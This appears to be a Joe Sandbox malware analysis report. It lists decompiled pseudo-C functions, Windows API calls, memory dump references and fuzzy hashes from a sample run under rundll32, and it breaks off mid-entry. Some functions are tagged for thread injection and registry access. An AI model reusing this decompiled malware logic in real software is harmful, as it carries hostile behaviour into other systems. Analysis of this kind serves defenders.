                                                          0x00e51fce
                                                          0x00e51fd1
                                                          0x00e51fd3
                                                          0x00000000
                                                          0x00e51fd3
                                                          0x00e51ecb
                                                          0x00e51ece
                                                          0x00e51fd6
                                                          0x00e51fd6
                                                          0x00e51ed4
                                                          0x00e51edb
                                                          0x00e51ee3
                                                          0x00e51fba
                                                          0x00e51ee9
                                                          0x00e51eef
                                                          0x00e51ef6
                                                          0x00e51ef9
                                                          0x00e51fa8
                                                          0x00e51eff
                                                          0x00000000
                                                          0x00e51eff
                                                          0x00e51eff
                                                          0x00e51eff
                                                          0x00e51eff
                                                          0x00e51f04
                                                          0x00e51f06
                                                          0x00e51f06
                                                          0x00e51f13
                                                          0x00e51f1b
                                                          0x00000000
                                                          0x00000000
                                                          0x00e51f1d
                                                          0x00e51f2a
                                                          0x00e51f30
                                                          0x00e51f30
                                                          0x00e51f33
                                                          0x00000000
                                                          0x00000000
                                                          0x00e51f35
                                                          0x00e51f40
                                                          0x00e51f54
                                                          0x00e51f8a
                                                          0x00e51f56
                                                          0x00e51f56
                                                          0x00e51f5d
                                                          0x00e51f65
                                                          0x00000000
                                                          0x00e51f67
                                                          0x00e51f67
                                                          0x00e51f72
                                                          0x00e51f75
                                                          0x00e51f7c
                                                          0x00000000
                                                          0x00e51f7c
                                                          0x00e51f75
                                                          0x00e51f65
                                                          0x00e51f8d
                                                          0x00e51f90
                                                          0x00e51f98
                                                          0x00e51f9e
                                                          0x00e51fa3
                                                          0x00e51fa3
                                                          0x00000000
                                                          0x00e51f98
                                                          0x00e51f3d
                                                          0x00000000
                                                          0x00e51f7f
                                                          0x00e51f7f
                                                          0x00000000
                                                          0x00e51f88
                                                          0x00e51faf
                                                          0x00e51faf
                                                          0x00e51fb5
                                                          0x00e51fb5
                                                          0x00e51ee3
                                                          0x00e51ece
                                                          0x00e51fe0
                                                          0x00e513ea
                                                          0x00e513ea
                                                          0x00e513f1
                                                          0x00e513fc
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00e513f1

                                                          APIs
                                                          • WaitForSingleObject.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00E54AFA,00000000,?), ref: 00E51F47
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00E54AFA,00000000,?,?), ref: 00E51F67
                                                            • Part of subcall function 00E5142C: wcstombs.NTDLL ref: 00E514EC
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp Download File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: ErrorLastObjectSingleWaitwcstombs
                                                          • String ID:
                                                          • API String ID: 2344289193-0
                                                          • Opcode ID: 5200f66bf2567547697b542b1343e5cdd29a02be7c445ca26cdb4f66ed1a6580
                                                          • Instruction ID: 1ff0bac765acffd4067778c0783f631f83f73d535e526e5f9d978cc75fc983d9
                                                          • Opcode Fuzzy Hash: 5200f66bf2567547697b542b1343e5cdd29a02be7c445ca26cdb4f66ed1a6580
                                                          • Instruction Fuzzy Hash: E2411C71A00209EFDF109F95D984AEEB7B9FF0434AF2458A9E902F6151D7349E489B21
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0558AE40, Relevance: 6.1, APIs: 4, Instructions: 110threadsynchronizationinjectionCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • memset.NTDLL ref: 0558AE6E
                                                          • ResumeThread.KERNEL32(?,?,00000004,00000004,?), ref: 0558AEF8
                                                          • WaitForSingleObject.KERNEL32(00000064), ref: 0558AF06
                                                          • SuspendThread.KERNEL32(?), ref: 0558AF19
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Thread$ObjectResumeSingleSuspendWaitmemset
                                                          • String ID:
                                                          • API String ID: 3168247402-0
                                                          • Opcode ID: 2c6862ce3a20b0929b34beb9e1ee41b74400428d4f829a94b4205b28945b9cc8
                                                          • Instruction ID: 013ff5213463d52ebec9843d61ada95777c27a71dfba83cd3d86485c983ab726
                                                          • Opcode Fuzzy Hash: 2c6862ce3a20b0929b34beb9e1ee41b74400428d4f829a94b4205b28945b9cc8
                                                          • Instruction Fuzzy Hash: 244153B1108342AFD711EF54C845D7BBBE9FF88360F04492EFA95A1160D731D954DB62
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00E54C9F, Relevance: 6.1, APIs: 4, Instructions: 98memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SysAllocString.OLEAUT32(80000002), ref: 00E54CF6
                                                          • SysAllocString.OLEAUT32(00E554F6), ref: 00E54D39
                                                          • SysFreeString.OLEAUT32(00000000), ref: 00E54D4D
                                                          • SysFreeString.OLEAUT32(00000000), ref: 00E54D5B
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp Download File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: String$AllocFree
                                                          • String ID:
                                                          • API String ID: 344208780-0
                                                          • Opcode ID: f680b2d3ab0156a53f580f55fe9b7f665deabe879547fa14a82a00cdfafdd0b6
                                                          • Instruction ID: 1aa696dfa8c756058fb5cacbb62f9f8d9491baaa344eb0be633719772ee96022
                                                          • Opcode Fuzzy Hash: f680b2d3ab0156a53f580f55fe9b7f665deabe879547fa14a82a00cdfafdd0b6
                                                          • Instruction Fuzzy Hash: 3F312DB1900209EFCB05DF98D8848EE7BB5FF4834AB10882EF905B7250D7759A89CF61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00E53D85, Relevance: 6.1, APIs: 4, Instructions: 98registrysynchronizationCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E00E53D85(void* __ecx, intOrPtr _a4) {
				int* _v8;
				int _v12;
				int* _v16;
				int _v20;
				int* _v24;
				char* _v28;
				void* _v32;
				long _t33;
				char* _t35;
				long _t39;
				long _t42;
				intOrPtr _t47;
				void* _t51;
				long _t53;

				_t51 = __ecx;
				_v8 = 0;
				_v16 = 0;
				_v12 = 0;
				_v24 = 0;
				_t33 = RegOpenKeyExA(0x80000003, 0, 0, 0x20019,  &_v32); // executed
				_t53 = _t33;
				if(_t53 != 0) {
					L18:
					return _t53;
				}
				_t53 = 8;
				_t35 = E00E55FBC(0x104);
				_v28 = _t35;
				if(_t35 == 0) {
					L17:
					RegCloseKey(_v32);
					goto L18;
				}
				_v20 = 0x104;
				do {
					_v16 = _v20;
					_v12 = 0x104;
					_t39 = RegEnumKeyExA(_v32, _v8, _v28,  &_v12, 0, 0, 0, 0); // executed
					_t53 = _t39;
					if(_t53 != 0xea) {
						if(_t53 != 0) {
							L14:
							if(_t53 == 0x103) {
								_t53 = 0;
							}
							L16:
							E00E513CC(_v28);
							goto L17;
						}
						_t42 = E00E55448(_t51, _v32, _v28, _v24, _v12,  &_v8, _a4); // executed
						_t53 = _t42;
						if(_t53 != 0) {
							goto L14;
						}
						goto L12;
					}
					if(_v12 <= 0x104) {
						if(_v16 <= _v20) {
							goto L16;
						}
						E00E513CC(_v24);
						_v20 = _v16;
						_t47 = E00E55FBC(_v16);
						_v24 = _t47;
						if(_t47 != 0) {
							L6:
							_t53 = 0;
							goto L12;
						}
						_t53 = 8;
						goto L16;
					}
					_v8 = _v8 + 1;
					goto L6;
					L12:
				} while (WaitForSingleObject( *0xe5a2c4, 0) == 0x102);
				goto L16;
			}

















                                                          0x00e53d85
                                                          0x00e53d9f
                                                          0x00e53da2
                                                          0x00e53da5
                                                          0x00e53da8
                                                          0x00e53dab
                                                          0x00e53db1
                                                          0x00e53db5
                                                          0x00e53e8f
                                                          0x00e53e93
                                                          0x00e53e93
                                                          0x00e53dbe
                                                          0x00e53dc5
                                                          0x00e53dcc
                                                          0x00e53dcf
                                                          0x00e53e84
                                                          0x00e53e87
                                                          0x00000000
                                                          0x00e53e8d
                                                          0x00e53dd5
                                                          0x00e53dd8
                                                          0x00e53ddf
                                                          0x00e53de9
                                                          0x00e53df2
                                                          0x00e53df8
                                                          0x00e53e00
                                                          0x00e53e38
                                                          0x00e53e72
                                                          0x00e53e78
                                                          0x00e53e7a
                                                          0x00e53e7a
                                                          0x00e53e7c
                                                          0x00e53e7f
                                                          0x00000000
                                                          0x00e53e7f
                                                          0x00e53e4d
                                                          0x00e53e52
                                                          0x00e53e56
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00e53e56
                                                          0x00e53e05
                                                          0x00e53e14
                                                          0x00000000
                                                          0x00000000
                                                          0x00e53e19
                                                          0x00e53e22
                                                          0x00e53e25
                                                          0x00e53e2c
                                                          0x00e53e2f
                                                          0x00e53e0a
                                                          0x00e53e0a
                                                          0x00000000
                                                          0x00e53e0a
                                                          0x00e53e33
                                                          0x00000000
                                                          0x00e53e33
                                                          0x00e53e07
                                                          0x00000000
                                                          0x00e53e58
                                                          0x00e53e65
                                                          0x00000000

                                                          APIs
                                                          • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,00E5755B,?), ref: 00E53DAB
                                                            • Part of subcall function 00E55FBC: RtlAllocateHeap.NTDLL(00000000,00000000,00E52035), ref: 00E55FC8
                                                          • RegEnumKeyExA.KERNEL32(?,?,?,00E5755B,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,00E5755B), ref: 00E53DF2
                                                          • WaitForSingleObject.KERNEL32(00000000,?,?,?,00E5755B,?,00E5755B,?,?,?,?,?,00E5755B,?), ref: 00E53E5F
                                                          • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,00E5755B,?,?,?,?,yE,00E5519C,?), ref: 00E53E87
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp Download File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: AllocateCloseEnumHeapObjectOpenSingleWait
                                                          • String ID:
                                                          • API String ID: 3664505660-0
                                                          • Opcode ID: b17a925ea98c26ddb56831f115629c3804ae8abd9ec9b585cc4900051c9b9b08
                                                          • Instruction ID: 72832b2e1d525a5acf905c95894c647bfc9faf32ce880f93a57f0def97c22ceb
                                                          • Opcode Fuzzy Hash: b17a925ea98c26ddb56831f115629c3804ae8abd9ec9b585cc4900051c9b9b08
                                                          • Instruction Fuzzy Hash: 21316B72D00219AACF21ABA5CC468EFFFF9EF44356F105966EA11B2160C7704E48DB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00E541D4, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 82COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E00E541D4(void* _a4, intOrPtr _a8, intOrPtr _a12) {
				int _v12;
				signed int _v16;
				void* _v20;
				signed char _v36;
				void* _t24;
				intOrPtr _t27;
				void* _t35;
				signed int _t38;
				signed char* _t46;
				int _t53;
				void* _t55;
				void* _t56;
				void* _t57;

				_v16 = _v16 & 0x00000000;
				_t46 = _a4;
				_t53 = ( *_t46 & 0x000000ff) + 0x110;
				_v12 = 0x110;
				_t24 = E00E55FBC(_t53);
				_a4 = _t24;
				if(_t24 != 0) {
					memcpy(_t24,  *0xe5a324, 0x110);
					_t27 =  *0xe5a328; // 0x0
					_t57 = _t56 + 0xc;
					if(_t27 != 0) {
						_t51 = _a4;
						E00E576A8(0x110, _a4, _a4, _t27, 0);
					}
					if(E00E5773D( &_v36) != 0) {
						_t35 = E00E53276(0x110, 0,  &_v36, _a4,  &_v20,  &_v12); // executed
						if(_t35 == 0) {
							_t55 = _v20;
							_v36 =  *_t46;
							_t38 = E00E52879(_t55, _a8, _t51, _t46, _a12); // executed
							_v16 = _t38;
							 *(_t55 + 4) = _v36;
							memset(_t55, 0, _v12 - (_t46[4] & 0xf));
							_t57 = _t57 + 0xc;
							E00E513CC(_t55);
						}
					}
					memset(_a4, 0, _t53);
					E00E513CC(_a4);
				}
				return _v16;
			}
















                                                          0x00e541da
                                                          0x00e541df
                                                          0x00e541ec
                                                          0x00e541ef
                                                          0x00e541f2
                                                          0x00e541f9
                                                          0x00e541fc
                                                          0x00e5420a
                                                          0x00e5420f
                                                          0x00e54214
                                                          0x00e54219
                                                          0x00e5421b
                                                          0x00e54224
                                                          0x00e54224
                                                          0x00e54233
                                                          0x00e54248
                                                          0x00e5424f
                                                          0x00e54256
                                                          0x00e5425c
                                                          0x00e54262
                                                          0x00e5426a
                                                          0x00e54270
                                                          0x00e54280
                                                          0x00e54285
                                                          0x00e54289
                                                          0x00e54289
                                                          0x00e5424f
                                                          0x00e54294
                                                          0x00e5429f
                                                          0x00e5429f
                                                          0x00e542ab

                                                          APIs
                                                            • Part of subcall function 00E55FBC: RtlAllocateHeap.NTDLL(00000000,00000000,00E52035), ref: 00E55FC8
                                                          • memcpy.NTDLL(00000000,00000110,{Q,{Q,?,?,?,?,?,00E552EA,?), ref: 00E5420A
                                                          • memset.NTDLL ref: 00E54280
                                                          • memset.NTDLL ref: 00E54294
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp Download File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: memset$AllocateHeapmemcpy
                                                          • String ID: {Q
                                                          • API String ID: 1529149438-1336059103
                                                          • Opcode ID: 85107b581536394dadc9def030a34b3a8db74c6ea84b9f3653a446e48cda925b
                                                          • Instruction ID: 826d4463de050abea9dd978aef9cffd56bc3f237d2092b444badb31bbbf0a5d8
                                                          • Opcode Fuzzy Hash: 85107b581536394dadc9def030a34b3a8db74c6ea84b9f3653a446e48cda925b
                                                          • Instruction Fuzzy Hash: 37217F76A00628ABDF01AFA5DC41FAEBBF8AF08345F045865FD04F6251D734DA588BA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00E53B91, Relevance: 6.1, APIs: 4, Instructions: 80registryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E00E53B91(int _a4, int _a8, void* _a12, short* _a16, char** _a20, intOrPtr* _a24) {
				long _t26;
				intOrPtr* _t38;
				char* _t42;
				long _t43;

				if(_a4 == 0) {
					L2:
					_t26 = RegOpenKeyW(_a8, _a12,  &_a12); // executed
					_t43 = _t26;
					if(_t43 == 0) {
						RegQueryValueExW(_a12, _a16, 0,  &_a8, 0,  &_a4); // executed
						if(_a4 == 0) {
							_t43 = 0xe8;
						} else {
							_t42 = E00E55FBC(_a4);
							if(_t42 == 0) {
								_t43 = 8;
							} else {
								_t43 = RegQueryValueExW(_a12, _a16, 0,  &_a8, _t42,  &_a4);
								if(_t43 != 0) {
									E00E513CC(_t42);
								} else {
									 *_a20 = _t42;
									_t38 = _a24;
									if(_t38 != 0) {
										 *_t38 = _a4;
									}
								}
							}
						}
						RegCloseKey(_a12);
					}
					L12:
					return _t43;
				}
				_t43 = E00E531D9(_a4, _a8, _a12, _a16, _a20, _a24);
				if(_t43 == 0) {
					goto L12;
				}
				goto L2;
			}







                                                          0x00e53b9d
                                                          0x00e53bc0
                                                          0x00e53bca
                                                          0x00e53bd0
                                                          0x00e53bd4
                                                          0x00e53bec
                                                          0x00e53bf1
                                                          0x00e53c39
                                                          0x00e53bf3
                                                          0x00e53bfb
                                                          0x00e53bff
                                                          0x00e53c36
                                                          0x00e53c01
                                                          0x00e53c13
                                                          0x00e53c17
                                                          0x00e53c2d
                                                          0x00e53c19
                                                          0x00e53c1c
                                                          0x00e53c1e
                                                          0x00e53c23
                                                          0x00e53c28
                                                          0x00e53c28
                                                          0x00e53c23
                                                          0x00e53c17
                                                          0x00e53bff
                                                          0x00e53c41
                                                          0x00e53c41
                                                          0x00e53c48
                                                          0x00e53c4e
                                                          0x00e53c4e
                                                          0x00e53bb6
                                                          0x00e53bba
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000

                                                          APIs
                                                          • RegOpenKeyW.ADVAPI32(80000002,051B9DC4,051B9DC4), ref: 00E53BCA
                                                          • RegQueryValueExW.KERNEL32(051B9DC4,?,00000000,80000002,00000000,00000000,?,00E55527,3D00E590,80000002,00E5755B,00000000,00E5755B,?,051B9DC4,80000002), ref: 00E53BEC
                                                          • RegQueryValueExW.ADVAPI32(051B9DC4,?,00000000,80000002,00000000,00000000,00000000,?,00E55527,3D00E590,80000002,00E5755B,00000000,00E5755B,?,051B9DC4), ref: 00E53C11
                                                          • RegCloseKey.ADVAPI32(051B9DC4,?,00E55527,3D00E590,80000002,00E5755B,00000000,00E5755B,?,051B9DC4,80000002,00000000,?), ref: 00E53C41
                                                            • Part of subcall function 00E531D9: SafeArrayDestroy.OLEAUT32(00000000), ref: 00E5325E
                                                            • Part of subcall function 00E513CC: RtlFreeHeap.NTDLL(00000000,00000000,00E520F3,00000000,00000000,?,00000000,?,?,?,?,?,00E568A9,00000000,?,00000001), ref: 00E513D8
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp Download File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: QueryValue$ArrayCloseDestroyFreeHeapOpenSafe
                                                          • String ID:
                                                          • API String ID: 486277218-0
                                                          • Opcode ID: a5f3157a182768d3e2217cb337b777ebfce09c801b82ca56b446cbbbdb031cbb
                                                          • Instruction ID: 83594663a0c86cf0356451c85ea2bb5b956d27c32a39a98aff8975f1e9212148
                                                          • Opcode Fuzzy Hash: a5f3157a182768d3e2217cb337b777ebfce09c801b82ca56b446cbbbdb031cbb
                                                          • Instruction Fuzzy Hash: F2213C7300015EBFCF119FA4DC80CEEBBA9EB04396B049825FE15B7120D2319E689BA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05572082, Relevance: 6.1, APIs: 4, Instructions: 64memoryregistryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?), ref: 055720A7
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 055720BE
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 055720D9
                                                          • RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?), ref: 055720F8
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: HeapQueryValue$AllocateFree
                                                          • String ID:
                                                          • API String ID: 4267586637-0
                                                          • Opcode ID: fed4088281ddee6424c35749fc38bf41269aac50afe2b8f82dac06e5db5734f8
                                                          • Instruction ID: 8eb0f4b25cf9d150551da92e332fcd9da2c8b6a7cd250a58a89c3aabb8099c9c
                                                          • Opcode Fuzzy Hash: fed4088281ddee6424c35749fc38bf41269aac50afe2b8f82dac06e5db5734f8
                                                          • Instruction Fuzzy Hash: 61111C7A500118FFDB229F85EC85CEEBFBDFB89250F114056F90292110D7716E84DB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00E5663C, Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 32%
                                                          			E00E5663C(intOrPtr __eax, intOrPtr __edi, long _a4, intOrPtr _a8) {
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v60;
				char _v64;
				long _t18;
				intOrPtr _t22;
				intOrPtr _t23;
				long _t29;
				intOrPtr _t30;
				intOrPtr _t31;
				intOrPtr* _t32;

				_t30 = __edi;
				_t29 = _a4;
				_t31 = __eax;
				_t18 = E00E54DA1(_t29, __edi, __eax); // executed
				_a4 = _t18;
				if(_t18 != 0) {
					memset( &_v60, 0, 0x38);
					_t22 =  *0xe5a2d4; // 0x435d5a8
					_v64 = 0x3c;
					if(_a8 == 0) {
						_t7 = _t22 + 0xe5b4e0; // 0x70006f
						_t23 = _t7;
					} else {
						_t6 = _t22 + 0xe5b90c; // 0x750072
						_t23 = _t6;
					}
					_v36 = _t31;
					_t32 = __imp__;
					_v52 = _t23;
					_v48 = _t29;
					_v44 = _t30;
					 *_t32(0);
					_push( &_v64);
					if( *0xe5a100() != 0) {
						_a4 = _a4 & 0x00000000;
					} else {
						_a4 = GetLastError();
					}
					 *_t32(1);
				}
				return _a4;
			}
















                                                          0x00e5663c
                                                          0x00e56643
                                                          0x00e56647
                                                          0x00e5664c
                                                          0x00e56653
                                                          0x00e56656
                                                          0x00e56660
                                                          0x00e56665
                                                          0x00e56671
                                                          0x00e56678
                                                          0x00e56682
                                                          0x00e56682
                                                          0x00e5667a
                                                          0x00e5667a
                                                          0x00e5667a
                                                          0x00e5667a
                                                          0x00e56688
                                                          0x00e5668b
                                                          0x00e56693
                                                          0x00e56696
                                                          0x00e56699
                                                          0x00e5669c
                                                          0x00e566a1
                                                          0x00e566aa
                                                          0x00e566b7
                                                          0x00e566ac
                                                          0x00e566b2
                                                          0x00e566b2
                                                          0x00e566bd
                                                          0x00e566bd
                                                          0x00e566c5

                                                          APIs
                                                            • Part of subcall function 00E54DA1: SysAllocString.OLEAUT32(?), ref: 00E54DFD
                                                            • Part of subcall function 00E54DA1: SysAllocString.OLEAUT32(0070006F), ref: 00E54E11
                                                            • Part of subcall function 00E54DA1: SysAllocString.OLEAUT32(00000000), ref: 00E54E23
                                                            • Part of subcall function 00E54DA1: SysFreeString.OLEAUT32(00000000), ref: 00E54E87
                                                          • memset.NTDLL ref: 00E56660
                                                          • Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 00E5669C
                                                          • GetLastError.KERNEL32 ref: 00E566AC
                                                          • Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 00E566BD
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp Download File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: StringWow64$Alloc$EnableRedirection$ErrorFreeLastmemset
                                                          • String ID:
                                                          • API String ID: 593937197-0
                                                          • Opcode ID: b9fac8abdeb095f3921738e65a27dfc1f8f125708d91ae6ac873788b0a2f34db
                                                          • Instruction ID: 5ed82165c81d60ec7e47431fbaf430edb058e3be668097fd643dc8f1b7883224
                                                          • Opcode Fuzzy Hash: b9fac8abdeb095f3921738e65a27dfc1f8f125708d91ae6ac873788b0a2f34db
                                                          • Instruction Fuzzy Hash: F9112AB1900218EFDB10DFA5D885BDD7BF8AB08396F448826ED05F7291D7B495088BA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05583AEA, Relevance: 6.0, APIs: 4, Instructions: 42stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 05585EA9: RtlAllocateHeap.NTDLL(00000000,?,05586423), ref: 05585EB5
                                                          • GetProcessImageFileNameW.PSAPI(?,00000000,00000800,00001000,0559C140,00000000,0557CC8B,?,0557CD20,?), ref: 05583B09
                                                          • PathFindFileNameW.SHLWAPI(00000000,?,?,00000000,00000800,00001000,0559C140,00000000,0557CC8B,?,0557CD20,?), ref: 05583B14
                                                          • _wcsupr.NTDLL ref: 05583B21
                                                          • lstrlenW.KERNEL32(00000000), ref: 05583B29
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: FileName$AllocateFindHeapImagePathProcess_wcsuprlstrlen
                                                          • String ID:
                                                          • API String ID: 2533608484-0
                                                          • Opcode ID: c408d2b6122d52c70c43ce99941ca3a6676baa26105f7b0856219dab44fceefd
                                                          • Instruction ID: bf707d8eea015857916d3314153cd0956710f123c746e8db1444132e7db4cb8f
                                                          • Opcode Fuzzy Hash: c408d2b6122d52c70c43ce99941ca3a6676baa26105f7b0856219dab44fceefd
                                                          • Instruction Fuzzy Hash: 24F0E9313151126F9B127B756CCDD7F9A5DFFD1E66B16082AF501E2040DF18CC0955A4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 055735E1, Relevance: 6.0, APIs: 4, Instructions: 37threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 05573600
                                                            • Part of subcall function 0557852A: RtlEnterCriticalSection.NTDLL(00000000), ref: 05578536
                                                            • Part of subcall function 0557852A: CloseHandle.KERNEL32(?), ref: 05578544
                                                            • Part of subcall function 0557852A: RtlLeaveCriticalSection.NTDLL(00000000), ref: 05578560
                                                          • CloseHandle.KERNEL32(?), ref: 0557360E
                                                          • InterlockedDecrement.KERNEL32(0559BFFC), ref: 0557361D
                                                            • Part of subcall function 0558BCA0: SetEvent.KERNEL32(000002DC,05573638), ref: 0558BCAA
                                                            • Part of subcall function 0558BCA0: CloseHandle.KERNEL32(000002DC), ref: 0558BCBF
                                                            • Part of subcall function 0558BCA0: HeapDestroy.KERNELBASE(055C0000), ref: 0558BCCF
                                                          • RtlExitUserThread.NTDLL(00000000), ref: 05573639
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: CloseHandle$CriticalSection$DecrementDestroyEnterEventExitHeapInterlockedLeaveMultipleObjectsThreadUserWait
                                                          • String ID:
                                                          • API String ID: 1141245775-0
                                                          • Opcode ID: 11b9e4542c0c21af2be1ecb5f13b401bce38236d1d9cb251ae4c2d6693dd6192
                                                          • Instruction ID: 24d0c2b5cc96f89a8b90b726b3077aec3d7eaa5821d7a3986104d89b44f00513
                                                          • Opcode Fuzzy Hash: 11b9e4542c0c21af2be1ecb5f13b401bce38236d1d9cb251ae4c2d6693dd6192
                                                          • Instruction Fuzzy Hash: 22F0C270611204ABCB055B699C4AF793B78FB45770F120209F422972C0EF789D0AABA8
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0557297D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54memorytimeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,69B25F44), ref: 055729BA
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000,00000000), ref: 05572A1B
                                                          Strings
                                                          Memory Dump Source
